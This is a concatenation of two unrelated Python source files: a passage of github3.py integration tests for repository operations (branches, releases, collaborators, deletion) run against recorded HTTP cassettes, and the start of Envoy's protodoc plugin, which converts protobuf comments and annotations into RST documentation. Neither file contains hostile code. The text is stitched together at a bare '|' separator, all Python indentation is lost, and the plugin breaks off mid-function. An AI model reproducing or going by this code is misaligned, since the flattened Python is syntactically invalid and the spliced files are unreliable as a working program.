"""Test the ability to add a collaborator to a repository."""
self.basic_login()
cassette_name = self.cassette_name('add_collaborator')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('testgh3', 'collaborators')
assert repository
assert repository.add_collaborator('sigmavirus24')
def test_assignees(self):
"""Test the ability to retrieve assignees of issues on a repo."""
cassette_name = self.cassette_name('assignees')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('kennethreitz', 'requests')
assert repository is not None
for assignee in repository.assignees():
assert isinstance(assignee, github3.users.User)
def test_branch(self):
"""Test the ability to retrieve a single branch in a repository."""
cassette_name = self.cassette_name('branch')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
branch = repository.branch('develop')
assert isinstance(branch, github3.repos.branch.Branch)
assert 'enabled' in branch.protection
def test_branches(self):
"""Test the ability to retrieve the branches in a repository."""
cassette_name = self.cassette_name('branches')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for branch in repository.branches():
assert isinstance(branch, github3.repos.branch.Branch)
def test_protected_branches(self):
"""Test the ability to retrieve protected branches in a repository."""
cassette_name = self.cassette_name('branches_protected')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
assert all(b.protection['enabled'] is True
for b in repository.branches(protected=True))
def test_code_frequency(self):
"""Test the ability to retrieve the code frequency in a repo."""
cassette_name = self.cassette_name('code_frequency')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for code_freq in repository.code_frequency():
assert isinstance(code_freq, list)
assert len(code_freq) > 0
def test_collaborators(self):
"""Test the ability to retrieve the collaborators on a repository."""
cassette_name = self.cassette_name('collaborators')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for collaborator in repository.collaborators():
assert isinstance(collaborator, github3.users.User)
def test_comments(self):
"""Test the ability to retrieve comments on a repository."""
cassette_name = self.cassette_name('comments')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for comment in repository.comments():
assert isinstance(comment, github3.repos.comment.RepoComment)
def test_commit_activity(self):
"""Test the ability to retrieve commit activity on a repo."""
cassette_name = self.cassette_name('commit_activity')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for activity in repository.commit_activity():
assert isinstance(activity, dict)
def test_commits(self):
"""Test the ability to retrieve commits on a repository."""
cassette_name = self.cassette_name('commits')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for commit in repository.commits(number=25):
assert isinstance(commit, github3.repos.commit.RepoCommit)
def test_contributor_statistics(self):
"""Test the ability to retrieve contributor statistics for a repo."""
cassette_name = self.cassette_name('contributor_statistics')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for stat in repository.contributor_statistics():
assert isinstance(stat, github3.repos.stats.ContributorStats)
def test_contributors(self):
"""Test the ability to retrieve the contributors to a repository."""
cassette_name = self.cassette_name('contributors')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for contributor in repository.contributors():
assert isinstance(contributor, github3.users.User)
assert isinstance(contributor.contributions, int)
def test_create_empty_blob(self):
"""Test the ability to create an empty blob on a repository."""
self.basic_login()
cassette_name = self.cassette_name('create_empty_blob')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('github3py', 'fork_this')
assert repository is not None
blob_sha = repository.create_blob('', 'utf-8')
assert blob_sha is not None
assert blob_sha != ''
def test_create_deployment(self):
"""Test the ability to create a deployment for a repository."""
self.basic_login()
cassette_name = self.cassette_name('create_deployment')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
deployment = repository.create_deployment('0.8.2')
assert isinstance(deployment, github3.repos.deployment.Deployment)
def test_create_release(self):
"""Test the ability to create a release on a repository."""
self.token_login()
cassette_name = self.cassette_name('create_release')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'charade')
assert repository is not None
release = repository.create_release(
'1.0.3.test', 'f1d4e150be7070adfbbdca164328d69723e096ec',
'Test release'
)
assert isinstance(release, github3.repos.release.Release)
def test_create_tag(self):
"""Test the ability to create an annotated tag on a repository."""
self.basic_login()
cassette_name = self.cassette_name('create_tag')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('github3py', 'fork_this')
assert repository is not None
tag = repository.create_tag(
tag='tag-name',
message='Test annotated tag creation',
sha='5145c9682d46d714c31ae0b5fbe30a83039a96e5',
obj_type='commit',
tagger={
'name': 'Ian Cordasco',
'email': '[email protected]',
'date': '2015-11-01T14:09:00Z'
}
)
assert isinstance(tag, github3.git.Tag)
def test_delete(self):
"""Test that a repository can be deleted."""
self.basic_login()
cassette_name = self.cassette_name('delete')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'my-new-repo')
assert repository is not None
assert repository.delete() is True
def test_deployment(self):
"""Test that a deployment can be retrieved by its id."""
cassette_name = self.cassette_name('deployment')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
deployment = repository.deployment(797)
assert isinstance(deployment, github3.repos.deployment.Deployment)
def test_deployments(self):
"""Test that a repository's deployments may be retrieved."""
cassette_name = self.cassette_name('deployments')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for d in repository.deployments():
assert isinstance(d, github3.repos.deployment.Deployment)
def test_directory_contents(self):
"""Test that a directory's contents can be retrieved."""
cassette_name = self.cassette_name('directory_contents')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
contents = repository.directory_contents('github3/search/')
for (filename, content) in contents:
assert content.name == filename
assert isinstance(content, github3.repos.contents.Contents)
assert content.content is None
assert content.decoded is None
def test_events(self):
"""Test that a user can iterate over the events from a repository."""
cassette_name = self.cassette_name('events')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
events = list(repository.events(number=100))
assert len(events) > 0
for event in events:
assert isinstance(event, github3.events.Event)
def test_file_contents(self):
"""Test that a file's contents can be retrieved."""
cassette_name = self.cassette_name('file_contents')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
contents = repository.file_contents('github3/repos/repo.py')
assert isinstance(contents, github3.repos.contents.Contents)
assert contents.content is not None
assert contents.decoded is not None
def test_forks(self):
"""Test that a user can iterate over the forks of a repository."""
cassette_name = self.cassette_name('forks')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
forks = list(repository.forks())
assert len(forks) > 0
for fork in forks:
assert isinstance(fork, github3.repos.Repository)
def test_hooks(self):
"""Test that a user can iterate over the hooks of a repository."""
self.basic_login()
cassette_name = self.cassette_name('hooks')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
hooks = list(repository.hooks())
assert len(hooks) > 0
for hook in hooks:
assert isinstance(hook, github3.repos.hook.Hook)
def test_ignore(self):
"""Test that a user can ignore the notifications on a repository."""
self.basic_login()
cassette_name = self.cassette_name('ignore')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('jnewland',
'gmond_python_modules')
assert repository is not None
subscription = repository.ignore()
assert subscription.ignored is True
def test_issue_events(self):
"""Test that a user can iterate over issue events in a repo."""
cassette_name = self.cassette_name('issue_events')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
events = list(repository.issue_events(number=50))
for ev in events:
assert isinstance(ev, github3.issues.event.IssueEvent)
def test_issues_sorts_ascendingly(self):
"""Test that issues will be returned in ascending order."""
cassette_name = self.cassette_name('issues_ascending')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
issues = list(repository.issues(direction='asc'))
assert len(issues) > 0
last_issue = None
for issue in issues:
assert isinstance(issue, github3.issues.Issue)
if last_issue:
assert last_issue.number < issue.number
last_issue = issue
def test_issues_accepts_state_all(self):
"""Test that the state parameter accets 'all'."""
cassette_name = self.cassette_name('issues_state_all')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
for issue in repository.issues(state='all'):
assert issue.state in ('open', 'closed')
def test_key(self):
"""Test the retrieval of a single key."""
self.basic_login()
cassette_name = self.cassette_name('key')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
key = repository.key(8820641)
assert isinstance(key, github3.users.Key)
def test_keys(self):
"""Test that the user can retrieve all deploy keys."""
self.basic_login()
cassette_name = self.cassette_name('keys')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
keys = list(repository.keys())
assert len(keys) > 0
for key in keys:
assert isinstance(key, github3.users.Key)
def test_labels(self):
"""Test that a user can retrieve a repository's labels."""
cassette_name = self.cassette_name('labels')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
labels = list(repository.labels())
assert len(labels) > 0
for label in labels:
assert isinstance(label, github3.issues.label.Label)
def test_languages(self):
"""Test that a repository's languages can be retrieved."""
cassette_name = self.cassette_name('languages')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for l in repository.languages():
assert 'ETag' not in l
assert 'Last-Modified' not in l
assert isinstance(l, tuple)
def test_license(self):
"""Test that a repository's license can be retrieved."""
cassette_name = self.cassette_name('license')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
license = repository.license()
assert isinstance(license, github3.licenses.License)
def test_milestone(self):
"""Test the ability to retrieve a milestone on a repository."""
cassette_name = self.cassette_name('milestone')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
milestone = repository.milestone(7)
assert isinstance(milestone, github3.issues.milestone.Milestone)
def test_milestones(self):
"""Test the ability to retrieve the milestones in a repository."""
cassette_name = self.cassette_name('milestones')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
milestones = list(repository.milestones())
assert len(milestones) > 0
for milestone in milestones:
assert isinstance(milestone, github3.issues.milestone.Milestone)
def test_network_events(self):
"""Test that a user can retrieve the events of a repo's network."""
cassette_name = self.cassette_name('network_events')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
events = list(repository.network_events())
assert len(events) > 0
for event in events:
assert isinstance(event, github3.events.Event)
def test_notifications(self):
"""Test that a user can retrieve their repo notifications."""
self.basic_login()
cassette_name = self.cassette_name('notifications')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
notifications = list(repository.notifications())
assert len(notifications) > 0
for notification in notifications:
assert isinstance(notification, github3.notifications.Thread)
def test_pull_requests(self):
"""Test that a user can retrieve the pull requests from a repo."""
cassette_name = self.cassette_name('pull_requests')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
pulls = list(repository.pull_requests())
assert len(pulls) > 0
for pull in pulls:
assert isinstance(pull, github3.pulls.PullRequest)
def test_pull_requests_accepts_sort_and_direction(self):
"""Test that pull_requests now takes a sort parameter."""
cassette_name = self.cassette_name('pull_requests_accept_sort')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
last_pr = None
for pr in repository.pull_requests(sort='updated',
direction='asc'):
assert pr is not None
if last_pr:
assert last_pr.updated_at < pr.updated_at
last_pr = pr
def test_release(self):
"""Test the ability to retrieve a single release."""
cassette_name = self.cassette_name('release')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
release = repository.release(76677)
assert isinstance(release, github3.repos.release.Release)
def test_release_latest(self):
"""Test the ability to retrieve the latest release."""
cassette_name = self.cassette_name('release_latest')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
release = repository.release_latest()
assert isinstance(release, github3.repos.release.Release)
def test_release_from_tag(self):
"""Test the ability to retrieve a release by tag name"""
cassette_name = self.cassette_name('release_from_tag')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
release = repository.release_from_tag('v0.7.1')
assert isinstance(release, github3.repos.release.Release)
def test_releases(self):
"""Test the ability to iterate over releases on a repository."""
cassette_name = self.cassette_name('releases')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for release in repository.releases():
assert isinstance(release, github3.repos.release.Release)
def test_refs(self):
"""Test the ability to retrieve the references from a repository."""
cassette_name = self.cassette_name('refs')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
references = list(repository.refs())
assert len(references) > 0
for ref in references:
assert isinstance(ref, github3.git.Reference)
def test_refs_raises_unprocessable_exception(self):
"""Verify github3.exceptions.UnprocessableResponseBody is raised."""
cassette_name = self.cassette_name('invalid_refs')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
with pytest.raises(exc.UnprocessableResponseBody):
list(repository.refs('heads/develop'))
def test_stargazers(self):
"""Test the ability to retrieve the stargazers on a repository."""
cassette_name = self.cassette_name('stargazers')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
stargazers = list(repository.stargazers())
assert len(stargazers) > 0
for user in stargazers:
assert isinstance(user, github3.users.User)
def test_statuses(self):
"""Test the ability to retrieve a commit's statuses."""
cassette_name = self.cassette_name('statuses')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
statuses = list(repository.statuses(
'0cea3860f91717272a5edb3961e9723b70769084'
))
assert len(statuses) > 0
for status in statuses:
assert isinstance(status, github3.repos.status.Status)
def test_subscribers(self):
"""Test the ability to retrieve a repository's subscribers."""
cassette_name = self.cassette_name('subscribers')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
subscribers = list(repository.subscribers())
assert len(subscribers) > 0
for user in subscribers:
assert isinstance(user, github3.users.User)
def test_subscription(self):
"""Test the ability to subscribe to a repository's notifications."""
self.basic_login()
cassette_name = self.cassette_name('subscription')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('vcr', 'vcr')
assert repository is not None
subscription = repository.subscribe()
assert subscription.subscribed is True
def test_tags(self):
"""Test the ability to retrieve a repository's tags."""
cassette_name = self.cassette_name('tags')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
tags = list(repository.tags())
assert len(tags) > 0
for tag in tags:
assert isinstance(tag, github3.repos.tag.RepoTag)
def test_teams(self):
"""Test the ability to retrieve teams assigned to a repo."""
self.basic_login()
cassette_name = self.cassette_name('teams')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('github3py', 'github3.py')
assert repository is not None
teams = list(repository.teams())
assert len(teams) > 0
for team in teams:
assert isinstance(team, github3.orgs.Team)
|
|
# protoc plugin to map from FileDescriptorProtos to Envoy doc style RST.
# See https://github.com/google/protobuf/blob/master/src/google/protobuf/descriptor.proto
# for the underlying protos mentioned in this file. See
# http://www.sphinx-doc.org/en/stable/rest.html for Sphinx RST syntax.
from collections import defaultdict
import cProfile
import functools
import os
import pstats
import StringIO
import sys
import re
from google.protobuf.compiler import plugin_pb2
from validate import validate_pb2
# Namespace prefix for Envoy core APIs.
ENVOY_API_NAMESPACE_PREFIX = '.envoy.api.v2.'
# Namespace prefix for Envoy top-level APIs.
ENVOY_PREFIX = '.envoy.'
# Namespace prefix for WKTs.
WKT_NAMESPACE_PREFIX = '.google.protobuf.'
# Namespace prefix for RPCs.
RPC_NAMESPACE_PREFIX = '.google.rpc.'
# http://www.fileformat.info/info/unicode/char/2063/index.htm
UNICODE_INVISIBLE_SEPARATOR = u'\u2063'
# Key-value annotation regex.
ANNOTATION_REGEX = re.compile(r'\[#([\w-]+?):(.*?)\]\s?', re.DOTALL)
# Page/section titles with special prefixes in the proto comments
DOC_TITLE_ANNOTATION = 'protodoc-title'
# Not implemented yet annotation on leading comments, leading to insertion of
# warning on field.
NOT_IMPLEMENTED_WARN_ANNOTATION = 'not-implemented-warn'
# Not implemented yet annotation on leading comments, leading to hiding of
# field.
NOT_IMPLEMENTED_HIDE_ANNOTATION = 'not-implemented-hide'
# Comment. Just used for adding text that will not go into the docs at all.
COMMENT_ANNOTATION = 'comment'
# proto compatibility status.
PROTO_STATUS_ANNOTATION = 'proto-status'
# Where v2 differs from v1.
V2_API_DIFF_ANNOTATION = 'v2-api-diff'
VALID_ANNOTATIONS = set([
DOC_TITLE_ANNOTATION,
NOT_IMPLEMENTED_WARN_ANNOTATION,
NOT_IMPLEMENTED_HIDE_ANNOTATION,
V2_API_DIFF_ANNOTATION,
COMMENT_ANNOTATION,
PROTO_STATUS_ANNOTATION,
])
# These can propagate from file scope to message/enum scope (and be overridden).
INHERITED_ANNOTATIONS = set([
PROTO_STATUS_ANNOTATION,
])
# Template for data plane API URLs.
# TODO(htuch): Add the ability to build a permalink by feeding a hash
# to the tool or inferring from local tree (only really make sense in CI).
DATA_PLANE_API_URL_FMT = 'https://github.com/envoyproxy/envoy/blob/master/api/%s#L%d'
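# Illustrative sketch, not part of the original plugin: the annotation syntax that
# ANNOTATION_REGEX is meant to match looks like this inside proto comments (the
# comment text here is hypothetical):
#   // Configures the widget. [#comment: internal note stripped from the docs]
#   // [#not-implemented-hide:]
# findall() returns (name, value) pairs; values keep any leading space, which
# ExtractAnnotations() below lstrip()s before storing them in the annotation map.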
class ProtodocError(Exception):
"""Base error class for the protodoc module."""
def FormatCommentWithAnnotations(s, annotations, type_name):
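"""Append RST admonitions implied by annotations to a comment string.
Args:
s: comment string with annotations already stripped.
annotations: annotation map extracted from the comment.
type_name: name of type the comment belongs to, e.g. 'message' or 'enum'.
Returns:
The comment string with any applicable RST warnings/notes appended.
"""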
if NOT_IMPLEMENTED_WARN_ANNOTATION in annotations:
s += '\n.. WARNING::\n Not implemented yet\n'
if V2_API_DIFF_ANNOTATION in annotations:
s += '\n.. NOTE::\n **v2 API difference**: ' + annotations[V2_API_DIFF_ANNOTATION] + '\n'
if type_name == 'message' or type_name == 'enum':
if PROTO_STATUS_ANNOTATION in annotations:
status = annotations[PROTO_STATUS_ANNOTATION]
if status not in ['frozen', 'draft', 'experimental']:
raise ProtodocError('Unknown proto status: %s' % status)
if status == 'draft' or status == 'experimental':
s += ('\n.. WARNING::\n This %s type has :ref:`%s '
'<config_overview_v2_status>` status.\n' % (type_name, status))
return s
def ExtractAnnotations(s, inherited_annotations=None, type_name='file'):
"""Extract annotations from a given comment string.
Args:
s: string that may contain annotations.
inherited_annotations: annotation map from file-level inherited annotations
(or None) if this is a file-level comment.
type_name: name of type the comment belongs to, e.g. 'message' or 'enum'.
Returns:
Pair of string with annotations stripped and annotation map.
"""
annotations = {
k: v
for k, v in (inherited_annotations or {}).items()
if k in INHERITED_ANNOTATIONS
}
# Extract annotations.
groups = re.findall(ANNOTATION_REGEX, s)
# Remove annotations.
without_annotations = re.sub(ANNOTATION_REGEX, '', s)
for group in groups:
annotation = group[0]
if annotation not in VALID_ANNOTATIONS:
raise ProtodocError('Unknown annotation: %s' % annotation)
annotations[group[0]] = group[1].lstrip()
return FormatCommentWithAnnotations(without_annotations, annotations,
type_name), annotations
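# Illustrative sketch, not part of the original plugin, of how ExtractAnnotations
# behaves on a flat comment string (the comment text is hypothetical):
#   text, notes = ExtractAnnotations(
#       'Upstream cluster settings. [#proto-status: draft]\n', type_name='message')
#   # notes == {'proto-status': 'draft'}
#   # text has the annotation stripped and, because the status is 'draft', a
#   # ".. WARNING::" admonition appended by FormatCommentWithAnnotations().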
class SourceCodeInfo(object):
"""Wrapper for SourceCodeInfo proto."""
def __init__(self, name, source_code_info):
self._name = name
self._proto = source_code_info
self._leading_comments = {str(location.path): location.leading_comments for location in self._proto.location}
self._file_level_comment = None
@property
def file_level_comment(self):
"""Obtain inferred file level comment."""
if self._file_level_comment:
return self._file_level_comment
comment = ''
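# Seed the search with the largest span value seen anywhere so that any location
# that actually has detached leading comments will compare as earlier.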
earliest_detached_comment = max(
max(location.span) for location in self._proto.location)
for location in self._proto.location:
if location.leading_detached_comments and location.span[0] < earliest_detached_comment:
comment = StripLeadingSpace(''.join(
location.leading_detached_comments)) + '\n'
earliest_detached_comment = location.span[0]
self._file_level_comment = comment
return comment
def LeadingCommentPathLookup(self, path, type_name):
"""Lookup leading comment by path in SourceCodeInfo.
Args:
path: a list of path indexes as per
https://github.com/google/protobuf/blob/a08b03d4c00a5793b88b494f672513f6ad46a681/src/google/protobuf/descriptor.proto#L717.
type_name: name of type the comment belongs to.
Returns:
Pair of attached leading comment and annotation map when there is a
leading comment, otherwise ('', []).
"""
leading_comment = self._leading_comments.get(str(path), None)
if leading_comment is not None:
_, file_annotations = ExtractAnnotations(self.file_level_comment)
return ExtractAnnotations(
StripLeadingSpace(leading_comment) + '\n', file_annotations,
type_name)
return '', []
def GithubUrl(self, path):
"""Obtain data plane API Github URL by path from SourceCodeInfo.
Args:
path: a list of path indexes as per
https://github.com/google/protobuf/blob/a08b03d4c00a5793b88b494f672513f6ad46a681/src/google/protobuf/descriptor.proto#L717.
Returns:
A string with a corresponding data plane API GitHub Url.
"""
for location in self._proto.location:
if location.path == path:
return DATA_PLANE_API_URL_FMT % (self._name, location.span[0])
return ''
class TypeContext(object):
"""Contextual information for a message/field.
Provides information around namespaces and enclosing types for fields and
nested messages/enums.
"""
def __init__(self, source_code_info, name):
# SourceCodeInfo as per
# https://github.com/google/protobuf/blob/a08b03d4c00a5793b88b494f672513f6ad46a681/src/google/protobuf/descriptor.proto.
self.source_code_info = source_code_info
# path: a list of path indexes as per
# https://github.com/google/protobuf/blob/a08b03d4c00a5793b88b494f672513f6ad46a681/src/google/protobuf/descriptor.proto#L717.
# Extended as nested objects are traversed.
self.path = []
# Message/enum/field name. Extended as nested objects are traversed.
self.name = name
# Map from type name to the correct type annotation string, e.g. from
# ".envoy.api.v2.Foo.Bar" to "map<string, string>". This is lost during
# proto synthesis and is dynamically recovered in FormatMessage.
self.map_typenames = {}
# Map from a message's oneof index to the fields sharing a oneof.
self.oneof_fields = {}
# Map from a message's oneof index to the "required" bool property.
self.oneof_required = {}
self.type_name = 'file'
def _Extend(self, path, type_name, name):
if not self.name:
extended_name = name
else:
extended_name = '%s.%s' % (self.name, name)
extended = TypeContext(self.source_code_info, extended_name)
extended.path = self.path + path
extended.type_name = type_name
extended.map_typenames = self.map_typenames.copy()
extended.oneof_fields = self.oneof_fields.copy()
extended.oneof_required = self.oneof_required.copy()
return extended
def ExtendMessage(self, index, name):
"""Extend type context with a message.
Args:
index: message index in file.
name: message name.
"""
return self._Extend([4, index], 'message', name)
def ExtendNestedMessage(self, index, name):
"""Extend type context with a nested message.
Args:
index: nested message index in message.
name: message name.
"""
return self._Extend([3, index], 'message', name)
def ExtendField(self, index, name):
"""Extend type context with a field.
Args:
index: field index in message.
name: field name.
"""
return self._Extend([2, index], 'field', name)
def ExtendEnum(self, index, name):
"""Extend type context with an enum.
Args:
index: enum index in file.
name: enum name.
"""
return self._Extend([5, index], 'enum', name)
def ExtendNestedEnum(self, index, name):
"""Extend type context with a nested enum.
Args:
index: enum index in message.
name: enum name.
"""
return self._Extend([4, index], 'enum', name)
def ExtendEnumValue(self, index, name):
"""Extend type context with an enum enum.
Args:
index: enum value index in enum.
name: value name.
"""
return self._Extend([2, index], 'enum_value', name)
def LeadingCommentPathLookup(self):
return self.source_code_info.LeadingCommentPathLookup(
self.path, self.type_name)
def GithubUrl(self):
return self.source_code_info.GithubUrl(self.path)
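# Illustrative sketch, not part of the original plugin: the path lists built by
# TypeContext mirror SourceCodeInfo.Location.path field numbers. Starting from a
# file-level context (names here are hypothetical):
#   ctx = TypeContext(source_code_info, 'envoy.api.v2')
#   msg_ctx = ctx.ExtendMessage(1, 'Cluster')   # path [4, 1]: 2nd top-level message
#   field_ctx = msg_ctx.ExtendField(0, 'name')  # path [4, 1, 2, 0]: its 1st field
# where 4 is FileDescriptorProto.message_type and 2 is DescriptorProto.field.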
def MapLines(f, s):
"""Apply a function across each line in a flat string.
Args:
f: A string transform function for a line.
s: A string consisting of potentially multiple lines.
Returns:
A flat string with f applied to each line.
"""
return '\n'.join(f(line) for line in s.split('\n'))
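# For example, MapLines(lambda line: line[1:], ' a\n b') returns 'a\nb'; this is
# how StripLeadingSpace() below drops the single leading space protoc leaves on
# each comment line.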
def Indent(spaces, line):
"""Indent a string."""
return ' ' * spaces + line
def IndentLines(spaces, lines):
"""Indent a list of strings."""
return map(functools.partial(Indent, spaces), lines)
def FormatInternalLink(text, ref):
return ':ref:`%s <%s>`' % (text, ref)
def FormatExternalLink(text, ref):
return '`%s <%s>`_' % (text, ref)
def FormatHeader(style, text):
"""Format RST header.
Args:
style: underline style, e.g. '=', '-'.
text: header text
Returns:
RST formatted header.
"""
return '%s\n%s\n\n' % (text, style * len(text))
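# For example (hypothetical title), FormatHeader('=', 'Listeners') produces:
#   Listeners
#   =========
# followed by a blank line.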
def FormatHeaderFromFile(style, file_level_comment, alt):
"""Format RST header based on special file level title
Args:
style: underline style, e.g. '=', '-'.
file_level_comment: detached comment at top of file.
alt: if the file_level_comment does not contain a user-specified
title, use the alt text as the page title.
Returns:
RST formatted header, and file level comment without page title strings.
"""
anchor = FormatAnchor(FileCrossRefLabel(alt))
stripped_comment, annotations = ExtractAnnotations(file_level_comment)
if DOC_TITLE_ANNOTATION in annotations:
return anchor + FormatHeader(
style, annotations[DOC_TITLE_ANNOTATION]), stripped_comment
return anchor + FormatHeader(style, alt), stripped_comment
def FormatFieldTypeAsJson(type_context, field):
"""Format FieldDescriptorProto.Type as a pseudo-JSON string.
Args:
type_context: contextual information for message/enum/field.
field: FieldDescriptor proto.
Return:
RST formatted pseudo-JSON string representation of field type.
"""
if NormalizeFQN(field.type_name) in type_context.map_typenames:
return '"{...}"'
if field.label == field.LABEL_REPEATED:
return '[]'
if field.type == field.TYPE_MESSAGE:
return '"{...}"'
return '"..."'
def FormatMessageAsJson(type_context, msg):
"""Format a message definition DescriptorProto as a pseudo-JSON block.
Args:
type_context: contextual information for message/enum/field.
msg: message definition DescriptorProto.
Return:
RST formatted pseudo-JSON string representation of message definition.
"""
lines = []
for index, field in enumerate(msg.field):
field_type_context = type_context.ExtendField(index, field.name)
leading_comment, comment_annotations = field_type_context.LeadingCommentPathLookup(
)
if NOT_IMPLEMENTED_HIDE_ANNOTATION in comment_annotations:
continue
lines.append('"%s": %s' % (field.name,
FormatFieldTypeAsJson(type_context, field)))
if lines:
return '.. code-block:: json\n\n {\n' + ',\n'.join(IndentLines(
4, lines)) + '\n }\n\n'
else:
return '.. code-block:: json\n\n {}\n\n'
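# Illustrative sketch, not part of the original plugin: for a message with a string
# field "name" and a repeated message field "filters" (hypothetical), the generated
# pseudo-JSON block looks roughly like:
#   .. code-block:: json
#
#     {
#       "name": "...",
#       "filters": []
#     }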
def NormalizeFQN(fqn):
"""Normalize a fully qualified field type name.
Strips leading ENVOY_API_NAMESPACE_PREFIX and ENVOY_PREFIX and makes pretty wrapped type names.
Args:
fqn: a fully qualified type name from FieldDescriptorProto.type_name.
Return:
Normalized type name.
"""
if fqn.startswith(ENVOY_API_NAMESPACE_PREFIX):
return fqn[len(ENVOY_API_NAMESPACE_PREFIX):]
if fqn.startswith(ENVOY_PREFIX):
return fqn[len(ENVOY_PREFIX):]
return fqn
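# For example, NormalizeFQN('.envoy.api.v2.Cluster') yields 'Cluster',
# NormalizeFQN('.envoy.cluster.OutlierDetection') yields 'cluster.OutlierDetection',
# and names outside the Envoy namespaces (e.g. '.google.protobuf.Duration') are
# returned unchanged.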
def FormatEmph(s):
"""RST format a string for emphasis."""
return '*%s*' % s
def FormatFieldType(type_context, field):
"""Format a FieldDescriptorProto type description.
Adds cross-refs for message types.
TODO(htuch): Add cross-refs for enums as well.
Args:
type_context: contextual information for message/enum/field.
field: FieldDescriptor proto.
Return:
RST formatted field type.
"""
if field.type_name.startswith(ENVOY_API_NAMESPACE_PREFIX) or field.type_name.startswith(ENVOY_PREFIX):
type_name = NormalizeFQN(field.type_name)
if field.type == field.TYPE_MESSAGE:
if type_context.map_typenames and type_name in type_context.map_typenames:
return type_context.map_typenames[type_name]
return FormatInternalLink(type_name, MessageCrossRefLabel(type_name))
if field.type == field.TYPE_ENUM:
return FormatInternalLink(type_name, EnumCrossRefLabel(type_name))
elif field.type_name.startswith(WKT_NAMESPACE_PREFIX):
wkt = field.type_name[len(WKT_NAMESPACE_PREFIX):]
return FormatExternalLink(
wkt,
'https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#%s'
% wkt.lower())
elif field.type_name.startswith(RPC_NAMESPACE_PREFIX):
rpc = field.type_name[len(RPC_NAMESPACE_PREFIX):]
return FormatExternalLink(
rpc,
